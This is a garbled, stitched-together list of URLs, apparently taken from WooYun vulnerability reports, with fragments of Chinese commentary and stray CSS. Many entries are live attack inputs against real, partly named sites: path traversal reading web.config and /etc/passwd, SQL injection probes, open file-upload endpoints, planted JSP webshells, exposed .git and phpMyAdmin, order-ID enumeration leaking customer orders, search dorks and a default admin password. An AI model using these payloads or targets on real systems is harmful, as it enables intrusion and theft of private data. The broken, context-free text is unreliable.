http://**.**.**.**/newsinfo.aspx?NodeCode=10001000200090001&id=331123 http://**.**.**.**/view.aspx?id=134123 http://**.**.**.**/info_03_html.aspx?Id=60123&tablename=CurrencyInfo http://**.**.**.**/view.aspx?id=123678 http://**.**.**.**/show.aspx?id=419&cid=123 http://**.**.**.**/visiondetail.aspx?NewsID=30123&CateID=355&NewsCateId=355 http://**.**.**.**/news.aspx?id=123144 http://**.**.**.**/default.aspx?quizid=12327&tabid=1415 http://**.**.**.**/Government/PublicInfoShow.aspx?ID=123 http://**.**.**.**/View.aspx?iMark=2&ListID=138&strName=123 http://**.**.**.**/NewDetials.aspx?id=47123&cid=1080 http://**.**.**.**/doc_show.aspx?artid=30123 http://**.**.**.**/templates/T_second/content.aspx?contentid=12314&nodeid=15&page=ContentPage http://**.**.**.**/news/ArticleDetails.aspx?id=123 http://**.**.**.**/NewsDetails.aspx?id=123 http://**.**.**.**/Item.aspx?id=33123 http://**.**.**.**/newsView.aspx?oid=3&tid=11&id=123 http://**.**.**.**/admin/PageLike.aspx?DocID=219123&ColumnID=000002640002&ChannelID=264&Sum=1 http://**.**.**.**/channel2/document.aspx?id=123103 http://**.**.**.**/channel2/document.aspx?id=123285 http://**.**.**.**/gq60zn/document.aspx?id=123103 http://**.**.**.**/gq60zn/document.aspx?id=123303 http://**.**.**.**/notice/viewnotice.aspx?id=40 http://www.iskyworth.com/ashx/productseach.ashx?TypeId= http://www.iskyworth.com/ashx/downlist.ashx?local=0&cid= http://www.skyworth.com.ph/ashx/productseach.ashx?TypeId= http://www.skyworth.com.ph/ashx/downlist.ashx?local=0&cid= http://www.iskyworth.com/ashx/productseach.ashx?TypeId= http://www.iskyworth.com/ashx/productseach.ashx?TypeId= http://bbs.huanqiu.com/member.php?mod=logging&action=login这个接口处,貌似是一个论坛的登录接口额,然后抓包发现用户名和密码都是明文传输的 http://mzpx.open.com.cn/MZ_Portal/index.aspx http://dev.anzhuoapk.com/developer/developer/fpwd http://112.126.71.144/ http://**.**.**.**/# http://www.jiumei.com/user/user_showlogin.dhtml?url=/account/order_showList.dhtml这个是酒美网主站的登录的接口,可以看到是有验证码限制的: http://union.kuwo.cn/install/ http://115.182.68.136:1984/?app_id=1&msg_id=0&device_info={"app_id":"1","app_name":"香港航空","app_version":"3.2.1","bssid":"00:00:00:00:00:00","cellLocation":"[0,0,0,0,0]","channel_name":"yyb","device_name":"andorid","imei":"A0000038000000","imsi":"000000000000000","mac_address":"00:00:00:00:00:00","manufacturer":"android","network_sub_type":"WIFI","network_type":"WIFI","os_version":"4.1.2","phone_number":"000000000000000","resolution":"1080*1920","sdk_version":"16","source":"NotificationService","timestamp":"1446130794661","uid":"NMAae6b5036b9e89a4eb72be5b2fc9fcc09"}&type=check_and_post_msg&language=0 http://**.**.**.**/news/newslist.asp?id=5 http://corp.b2b.cn/category/Category/index/cid/321 http://corp.b2b.cn/category/Category/index?cid=321 http://**.**.**.**/bugs/wooyun-2010-0136386 height:20px;BORDER http://xiaoshou.qzestate.com:8000/index.aspx http://**.**.**.**/admin/index/ http://**.**.**.**/admin/newsdir/edit.html http://bm.huatu.com/member/upfile/ http://**.**.**.** http://119.254.70.128/ http://119.254.70.128/Superagent/Reports00.aspx http://**.**.**.**/admin_login.aspx http://**.**.**.**/upload/2015_10/temp_15103011048856.aspx http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:81/xwd/admin/backup.aspx http://**.**.**.**/admin/backup.aspx# http://**.**.**.**:81/xwd/download2.aspx?fn=../web.config http://**.**.**.**/download2.aspx?fn=../web.config http://**.**.**.**/wd/download2.aspx?fn=../web.config http://**.**.**.**/dfsxzzj/download2.aspx?fn=../web.config http://**.**.**.**/wd90/download2.aspx?fn=../web.config http://**.**.**.**/wd/download2.aspx?fn=../web.config http://**.**.**.**/download2.aspx?fn=../web.config http://**.**.**.**:81/download2.aspx?fn=../web.config http://**.**.**.**/download2.aspx?fn=../web.config http://**.**.**.**:8091/hw/download2.aspx?fn=../web.config http://**.**.**.**/xywd/download2.aspx?fn=../web.config http://**.**.**.**/xywd/download2.aspx?fn=../web.config http://**.**.**.**/wd/download2.aspx?fn=../web.config http://**.**.**.**/dzwd/download2.aspx?fn=../web.config http://**.**.**.**/wd/download2.aspx?fn=../web.config http://**.**.**.**/bugs/wooyun-2015-0141194 height:20px;BORDER http://erp.aoyou.com:8060/login URL:http://epare.airchina.com.cn http://epare.airchina.com.cn/epare/servlet/FileUploadManagerServlet?method=download&UUID=502ec3c5-177b-4b4c-beb1-126c38593a27 http://epare.airchina.com.cn/epare/servlet/FileUploadManagerServlet?method=download&UUID=7b2ae38e-c200-4359-a2ca-708b80627961 http://epare.airchina.com.cn/epare/servlet/FileUploadManagerServlet?method=download&UUID=3a5f5aa9-adfc-4e3f-9684-1854c7abca26 http://**.**.**.**/online/onabout!showList.action http://m.huatu.com http://**.**.**.**/project_content.php?id=163 http://**.**.**.**/news.php?bid=13 http://**.**.**.**/aboutus.php?id=175 http://buy.vmall.com/check_order.html?skuIds=120894853&uid=260086000053594839&user=%E8%BF%BD%E6%A2%A6%E7%95%85%E7%8E%A9y&activityId=1208&componentIds=&orderSign=810c95d5e406a516cbe9176fb4254cf0&queueSign=undefined&name=%E8%BF%BD%E6%A2%A6%E7%95%85%E7%8E%A9y&ts=1438048802356&valid=1&sign=2b907a1d23ea96235642c808d879ad67&ticket=1ST-265953-1uj5JM3wdrMFHZKr1pur-cas&cid=null&wi=null# http://**.**.**.**/addQuestion.aspx http://**.**.**.**/bugs/wooyun-2010-047165 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://www.jintoneguilin.info//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://www.50pk.tv/user/City_ajax.aspx?Cityid=1 http://www.viennaguilin.info/user/City_ajax.aspx?Cityid=1 http://**.**.**.**:84/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://www.guishanhotel.info/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://www.ronghuhotel.info/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**//user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/user/City_ajax.aspx?Cityid=1 http://**.**.**.**/news_view.php?id=485 http://**.**.**.**/works_view.php?id=330 http://**.**.**.**/about.php?id=79&c=2 height:20px;BORDER http://rdetoway.midea.com.cn/web/rdlogin.jsp http://**.**.**.**/ http://**.**.**.**/downloaddetail.asp?FileName=downloaddetail.asp http://mail.swufe.edu.cn/ http://**.**.**.**/ http://**.**.**.**/Files/upload/2013-09-02/33b97934-74ee-4ddf-954a-ee5d01e8280f.doc http://club.codoon.com/俱乐部ID/member/detail/俱乐部成员ID/ http://**.**.**.**:81/ http://**.**.**.**/其中链接**.**.**.**/materialgathers!getList.action?flag=15&page=1存在命令执行漏洞 http://cn.arsenal.com/newsdetail.php?id=1405 http://**.**.**.**:83/scjt/lkxxServlet?method=getLkxxView&id=80B4E54C-7904-4859-839E-089D81AEA90B http://**.**.**.**/guidepost/sp.asp http://**.**.**.**:81 http://**.**.**.**:81/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://service.wode20.com:80/api/newsinfo/newsdetail?******* http://**.**.**.**/news/List.aspx?id=0&words=* http://**.**.**.**/user/index/register?&mobile=XXXXX&password=XXXXX&confirm_password=XXXXX&invite_vcode= http://202.104.30.220/po/find.do http://**.**.**.**/jiaowuchu/jiaogai/default.asp http://**.**.**.**/news_jslist.aspx?classId=36 app.php/login?goto=%2Fshao%2Fweb%2Fapp.php http://**.**.**.**/qzxianxue.rar http://**.**.**.**/点击下图标识中的其中一个链接,均存在命令执行漏洞 http://wooyun.org/bugs/wooyun-2010-0109859 http://210.14.78.115/是天天果园的网站 http://210.14.78.115/ http://210.14.78.115/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/news_all.asp?id=10 http://www.easy-u.com.cn/index.php http://**.**.**.**/admin/login2.aspx http://**.**.**.**/bugs/wooyun-2015-0150732 http://115.182.68.136/hkbaobiao/index.php?/ums/postActivityLog http://**.**.**.**/ http://**.**.**.**/news.asp?id=1354 inurl:hack.asp?pageno= http://**.**.**.**/ http://**.**.**.**/login.html http://**.**.**.**/Golm.asp?id=17139 http://**.**.**.**/login.asp?user=admin'&pass=admin http://user.huxiu.com/ http://user.huxiu.com/.git/ http://shop.zymk.cn/index.php/Tag/?id=2&order=listorder http://182.148.109.57:8090/index.jsp https://github.com/zhangdragon/melon-sg/blob/6bdd1f06cf532727ea6b639de852bfeaf405babb/main/resources/application-props/application.properties file:d:/AjaxUploadFiles file:d:/AjaxUploadFiles http://**.**.**.**/AchievementProjectView.aspx?id=30 http://bm.shnu.edu.cn/shtu/login/studentLoginAction.do http://**.**.**.**/freejobs/rctj4site.asp?website=360400 http://**.**.**.**/u.htm?id=600812 http://**.**.**.**/data/ http://**.**.**.**/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.php http://**.**.**.**/admin/admin.php http://**.**.**.**/admin/index.php http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:81/ http://**.**.**.**/bgoa/oa/ http://120.25.213.204:8001/ http://120.25.213.204:8001/ http://**.**.**.**/LoginPGD.aspx http://**.**.**.**/DBMS/FindHoldList.aspx?h=517&key=&parent=1 http://**.**.**.**/sites/main/internal//editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/aspx/connector.aspx http://**.**.**.**/data/AjaxService.aspx?method=selectzlml&pageSize=10&pageIndex=1&n= http://gps.lnwin.com/ http://gps.lnwin.com/Server/UserServer.asmx http://oa.chinawanda.com:1010/ com:1010 http://**.**.**.**/lookup/yibaoht/user/loadinghos.asp?id= http://**.**.**.**/bugs/wooyun-2013-024919 http://**.**.**.**/news/list.aspx?seachXlid=1285 http://219.238.206.50:8001/ http://219.238.206.50:8001/enterprise/list.asp?type=3 http://www.api.zhuna.cn/e/json_app.php?tm2=2015-11-01&hid=135975&tm1=2015-10-31&orderfrom=157&ver=20&os=android&agentId=157&unionId=0&version=3.4.0&os=android http://**.**.**.** http://**.**.**.**/ http://oa.**.**.**.**/tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/null上传的文件名.jsp http://oa.**.**.**.**/nulljspspy.jsp http://bbs.hiapk.com/bbs.hiapk.com.tar.gz http://ucenter.b5m.com/tologin.htm https://**.**.**.**/18601105586/CDRMonitor2.0/blob/f5ab2228c8ebec579527ce3e2d09fc0a384b0621/src/com/cucc/cdrmonitor/storm/bolt/emitter/EmailEmitter.java http://faw3s.com/Member/Login.aspx http://www.tjfaw2013.com/Manager/login.aspx http://**.**.**.**/android_update.json http://**.**.**.**/update/installer/yixin.apk","fileName":"yixin.apk","title":"5qOA5rWL5Yiw5paw54mI5pys","description":"MS7jgJDmlrDlop7jgJHnvqTkuLvmlK/mjIHorr7nva7nrqHnkIblkZjjgIHlhaXnvqTpqozor4Hj\ngIHpgoDor7fmlrDmiJDlkZjnmoTmnYPpmZDphY3nva4KMi7jgJDmlrDlop7jgJHpnZLmnpznmoRH\nSUbmiqXorablm77niYfmlK/mjIHmt7vliqDliLDoh6rlrprkuYnooajmg4UKMy7jgJDkvJjljJbj\ngJHpnZLmnpznlKjmiLflj6/ku47igJzlj5HnjrDigJ3kuK3igJzpnZLmnpzmkYTlg4/mnLrigJ3n\nm7TmjqXov5vlhaUKNC7jgJDkvJjljJbjgJHosIPmlbTkvJjljJbkuobpppbluKfmtojmga/liJfo\noajkuK3kv6Hmga/mlLblj5HnmoTnvKnnlaXmlofmoYgKNS7jgJDkvJjljJbjgJHosIPmlbTkvJjl\njJbkuobmmJ/luIHlub/lnLrpppbpobXop4bop4nvvIzkvJjljJbpgJror53ml7bplb/lhZHmjaLm\ntYHnqIsKNi7jgJDkvJjljJbjgJHkvJjljJboh6rlrprkuYnooajmg4Xmt7vliqDlip/og73kuqTk\nupLmtYHnqIvlj4rop4bop4kKNy7jgJDkv67lpI3jgJHkv67lpI3oi6XlubJidWc=","notify":true,"mini":0,"length":46306404,"patch":false,"patchMd5":"","patchDownloadUrl":"","patchLength":0 http://oa.99114.com http://oa.99114.com/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER admin:123,登陆后要强制改密码 http://oa.intime.com.cn http://oa.intime.com.cn/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://hq.fruitday.com:88/ http://hq.fruitday.com:88/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://chaoshi.12t.cn http://chaoshi.12t.cn/include/upload.php http://**.**.**.**/download/download.jsp?filepath=/web-inf/web.xml&filename=web.xml http://**.**.**.**/news_info.php?typeid=13&id=809 http://www.dcominfo.com/product/index.php?type_id=9 https://github.com/lianggui1983/MesDemo/blob/71afe72065822728c6a275545222db24674e9058/MesSharp/samples/OSharp.Demo.Web/Config/MailSetting.config IsHtml:true EnableSsl:false http://**.**.**.**/costweb/ http://**.**.**.**/costweb/bmPlan/view.do?op=init http://**.**.**.**/costweb/bmperson/view.do?op=printBmInfo&personID=116443 http://**.**.**.**/costweb/bmperson/view.do?op=printBmInfo&personID=116453 http://**.**.**.**/costweb/bmperson/view.do?op=printBmInfo&personID=104453 http://**.**.**.**/costweb/bmperson/view.do?op=printBmInfo&personID=111453 http://**.**.**.**/costweb/bmperson/view.do?op=printBmInfo&personID=106453 http://www.fawcar.com.cn/module/pageNews_search.jsp?pageFile=pageNews_search&Type=1&sonID=&Main=xxdt&page=1&link_css=link_data&key= http://**.**.**.**/网址,拔出“御剑”一阵乱砍,该http://**.**.**.**/phpmyadmin/index.php立马躺枪。啥都不用登陆,直接访问,不敢相信吧,我自己都不敢相信,吗的,服了。 http://**.**.**.**/reg.aspx?gwid= http://**.**.**.**/querySchool.aspx http://**.**.**.**/zsch_sdhd/member.do?op=login&eventName= http://**.**.**.**/account/getxytg?filetype=G http://**.**.**.**/masjyweb/i/onlineInvite/all http://**.**.**.**/index.php?s=/Index/jobinfo/id/868.html http://**.**.**.**/index.php?s=/Index/jobinfo/id/868*.html http://**.**.**.**/Case.aspx?SoftType=1 http://mail.baofeng.com/extmail/cgi/index.cgi?__mode=show_login http://mail.baofeng.com/extmail/cgi/index.cgi?__mode=show_login IP:114.112.82.33 http://app.wandahotels.com/hotelprocess/found/groupHot.action http://wx.crc-gas.com/admin https://github.com/wubinhong/soa-dubbo/blob/3da8fc3ab7a0d689ed28fa0db3565c78c2a1113e/choumei-frame/demo-center/src/main/resources/system.properties https://github.com/wubinhong/soa-dubbo/blob/3da8fc3ab7a0d689ed28fa0db3565c78c2a1113e/choumei-frame/sample-center/src/main/resources/system.properties http://**.**.**.**/front/articlenews/articlenewsshow.aspx?Uid=201507221452478039rwliqian http://**.**.**.**/front/articlenews/articlenewsshow.aspx?Uid=201507221452478039rwliqian http://**.**.**.**/front/articlenews/articlenewsshow.aspx?Uid=201507221452478039rwliqian http://app.wandahotels.com/hotelprocess/membership/getMembershipList.action http://**.**.**.**/XTGT/admin//FCKeditor/editor/filemanager/connectors/test.html http://yjs.zjut.edu.cn/yjssql_xxjhpt/login.asp http://yjs.zjut.edu.cn/yjssql_xxjhpt/NewStudentStatus/studentStatus-Print.asp?xuehao=1111502119 http://**.**.**.**/login.aspx http://oa.bestv.com.cn http://oa.bestv.com.cn/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/ http://**.**.**.**/model/twogradepage/devTrans.aspx?devcode= http://**.**.**.**/model/TwoGradePage/NewsEquipment.aspx?OpenID=%7BOpenID%7D&id= http://**.**.**.**/model/TwoGradePage/CIntroduce.aspx?columnId= http://svn.chinawanda.com:8008/ http://svn.chinawanda.com:8008/Data/db/cwoa1431310103.sql http://svn.chinawanda.com:8008/admin.php?ac=duty&fileurl=duty&menuid=31&pc_hash=20151101003223 http://**.**.**.**/) http://**.**.**.**:8080/zncj/main http://**.**.**.**:8080/zncj/picfile/35a790c20e854adcb8da5809437c3ddb.jpg http://**.**.**.**:82/oia/upload/upload.jsp http://**.**.**.**:82/oia/UploadFile//9999//header/20151012157281.jsp?pas=wooyun http://www.fusionskye.com/news.php?y=2010&m=02 http://211.99.26.182/login.jsp http://**.**.**.**/case/ http://b.b2b.cn/news/InfoList.aspx?categoryid=3&Names=1 http://www.suning.com/webapp/wcs/stores/servlet/MyOrder?storeId=10052&catalogId=10051&otherOrder=1 http://member.suning.com/emall/queryLineOrderDetail?omsOrderId=(修改数字参数,可出现不同订单详情) http://member.suning.com/emall/queryLineOrderDetail?omsOrderId=000279131109 http://member.suning.com/emall/queryLineOrderDetail?omsOrderId=000279131219 http://member.suning.com/emall/queryLineOrderDetail?omsOrderId=000276131219 http://member.suning.com/emall/queryLineOrderDetail?omsOrderId=000276231219 http://member.suning.com/emall/queryLineOrderDetail?omsOrderId=000176231219 http://member.suning.com/emall/queryLineOrderDetail?omsOrderId=000156231219 https://www.baidu.com/s?wd=4008365365%E8%AF%88%E9%AA%97 http://**.**.**.**/main.aspx?page=detail.aspx&id=3984 http://**.**.**.**/detail.aspx?id=3984 http://**.**.**.**/wsyb/Input.aspx?id=9 http://**.**.**.**/about.php?id=13 http://**.**.**.**/caselist.php?id=55 http://**.**.**.**/huodonglist.php?id=46 http://**.**.**.**/news.php?id=16 http://**.**.**.**/newsDetail.php?id=34&tid=13 http://**.**.**.**/product.php?id=1 http://**.**.**.**/productDetail.php?id=48&pid=1&tid=1 http://**.**.**.**/shhzhx.php?id=5&pid=24 http://www.ubestchoice.co/shhzhxDetail.php?id=120&tid=2 http://www.ubestchoice.co/srshqDetail.php?id=53 http://oa.chinawanda.com:1010/ http://oa.chinawanda.com:1010/eweb/php/file_manager_json.php?dir=file&path=/ https://mail.corp.elong.com http://211.***.***.152 http://tech.corp.elong.com指向某内网IP http://**.**.**.** http://**.**.**.**/pic_detail.php?code=54&table_name=tb_pic http://**.**.**.**/main.php?mod_id=17 http://union.winenice.com/Basic/Login.aspx登录位置的验证码设计缺陷,输入正确抓包后不会失效的,而且用户名密码都是明文传输的: http://2011.sheji.b2b.cn/Product/alllist2012.aspx?CategoryID=455&Page=&ProductName=0&txtKey=1 http://2011.sheji.b2b.cn/Product/alllist2012.aspx?CategoryID=455&Page=&ProductName=0&txtKey=1* http://**.**.**.**/admin/shtitle.php?id=3979 http://oa.t3.com.cn/ http://oa.t3.com.cn/messager/users.data http://**.**.**.**:8888/MyWork/YinZhang/MyYinZhang.aspx http://**.**.**.**:8081/carxygh/webinfo/maintenance_more.jsp?type=105 http://**.**.**.**/etc/infomation_login.html?p=&gateid= http://zcgl.swufe.edu.cn/index.aspx http://rsc.scu.edu.cn/Account/UserLogin.aspx http://www.scuinfo.com/api/comments?postId=7359 http://**.**.**.**/showall.asp?table=twsjy&fID=32 http://api.himoca.com/moca/award/get?uid=1 http://math.ecnu.edu.cn/RCFOA/seminar_template.php?id=290 http://zcjy.ecnu.edu.cn/ http://zcjy.ecnu.edu.cn/NewsDetail.aspx?id=114 zcjy.ecnu.edu.cn/NewsDetail.aspx?id=114 ftp://m.xdowns.com/ http://www.8684.com主站的登录位置没有登录限制: http://**.**.**.**/gxpt/SiteInfo/SiteInfo_Moresel.php?Bar_ID=201 http://**.**.**.**/gxpt/Docu/Docu_sel.php?Sort_ID=16 http://**.**.**.**/gxpt/Docu/Docu_selinfo.php?ID=262 http://**.**.**.**/inter.php?action=gbook&ut=0&s=1 http://**.**.**.**/lesson_more.php?id=86 http://**.**.**.**/sehui_list.php?fl2=%EF%BF%BD%EF%BF%BD%D1%A7%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CA%B5%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD% http://**.**.**.**/loginform.php http://**.**.**.**/new_view.asp?id=870 http://**.**.**.**/docs/hqysl/Commentlist.aspx?ItemID=19 http://**.**.**.**/showproduct.aspx?ProductID=6525&CategoryFilterID=352 http://**.**.**.**/ieDatumAction.public?p=downloadFileByPath&filePath=../../../../../../etc/passwd http://**.**.**.**/ieDatumAction.public?p=downloadFileByPath&filePath=WEB-INF/web.xml http://**.**.**.**/ieDatumAction.public?p=downloadFileByPath&filePath=../../../../../../etc/passwd http://service.iciba.com//comment/get/hot?wid=1602&zid=14&id=0&count=10&start=0&ck=43fb362561eea5dd218659148819c123&uuid=77f******7&sv=android****&v=8.2.5&uid=********×tamp=1446361375&signature=79da46b570d26909a5fd43005f232ab3&key=1000005 https://github.com/andersfan/mishi.apitest/blob/60943ca8c3b97873193b77ebbce3fa80fa5f3b7e/src/main/resources/config/system.properties com:330***** http://test-api.mishi.cn/api http://test-h5.mishi.cn http://test-upload.mishi.cn http://**.**.**.**:8088/myPaper/dk_zxksView.aspx?ksType=0&tID=1'&ecID=1&ModuleID=1 http://**.**.**.**//myPaper/dk_zxksView.aspx?ksType=0&tID=1'&ecID=1&ModuleID=1 http://**.**.**.**:8000/myPaper/dk_zxksView.aspx?ksType=0&tID=1'&ecID=1&ModuleID=1 http://**.**.**.**:8888/ http://**.**.**.**:8888/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/show/infolist.php?c=UUPHPfmjU77Ufmb http://**.**.**.**/show/info.php?id=JkaauTEETkOua3H0 http://**.**.**.**/show/getdateinfo.php?d=2015-11-01 http://**.**.**.**/mail/enContact.php https://sso.zt-express.com/ it.zt-express.com/Views/New/NewView.aspx?id=39937 http://**.**.**.**/public/article/detail/id/1228*/p_id/2 http://**.**.**.**/admin/auth/login http://**.**.**.**/upload/path/test.php http://m.qyer.com/login/login.php?refer=http://m.qyer.com/接口登录位置一开始貌似是没有验证码的,但是后来就出来验证码了 www.57364642@qq.com http://audidtms.faw-vw.com/UserManager/login.do http://audidtms.faw-vw.com/commonUpload.jsp?flag=1&key=2015110152594392 http://**.**.**.**/Groupon/Coupon/index/token/hnqzhx1397510089?code=02162371569eeb8b5ba829956f880a3i&state=1 https://sso.zt-express.com/ oa.zt-express.com/OA/InfoCenter/ConsignmentInfo/consignmentselect.aspx?method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b http://www.668xd.com/ http://www.668xd.com/668xd.zip http://www.668xd.com/cssksoft_phpmyadmin/index.php http://oa.mfc.com.cn:81//weaver/weaver.email.FileDownloadLocation?fileid=25*&download=1 http://oa.mfc.com.cn:81//admin.jsp http://**.**.**.**/ http://**.**.**.**/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/wooyun.txt http://**.**.**.**/tempEvent/sxunicom_fans_feedback/ http://**.**.**.**/index.php?m=mobile&a=getCode&f=unicom http://**.**.**.**/bugs/wooyun-2010-061009 http://**.**.**.**/bugs/wooyun-2014-077360 inurl:questionnaire_id http://**.**.**.**/sofpro/gecs/questionnaire/web_list.jsp?questionnaire_id=3 http://oa.superjia.com http://oa.superjia.com/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://60.191.25.162:5222/users/sign_in https://sso.zt-express.com http://oa.zt-express.com/OA/InfoCenter/NobillInfo/showbig.aspx?method=&billnumber=716665&sign=nobillinfo http://zcgl.swufe.edu.cn/index.aspx http://**.**.**.**/view/default.php?func=listAll&catalog=0703 http://weixin.juneyaoair.com/ws/service/tcityAirportInfoService/getAirTransports http://118.122.88.90:60465/ http://118.122.88.90:60465/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER 